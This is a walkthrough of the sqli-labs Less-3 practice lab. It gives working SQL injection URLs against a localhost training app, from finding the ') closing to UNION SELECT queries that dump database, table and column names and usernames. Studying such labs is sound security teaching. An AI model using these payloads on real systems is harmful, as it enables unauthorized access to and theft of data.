sqli-labs less 3

1. Enter id and display normally

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

2. Determine whether the numeric type or the character type. 1=1 and 1=2 both show normal, indicating that it is character injection

http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=2

Three, determine the closing method
1. Try single quotes, report an error

http://127.0.0.1/sqli-labs-master/Less-3/?id=1'

2. Try to add a comment character and report an error

http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+

3. If you still report an error after adding a comment, try to add parentheses. If the page is normal, the closing method is')

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+

Four, determine the number of fields

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') order by 3 --+

Five, judge the display position

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+

Six, burst all databases

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

Seven, explode all tables in the designated database (security)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

Eight, explode all columns in the specified table (users)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

Nine, burst all data in the specified column (username)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(username) from users),3 --+

over~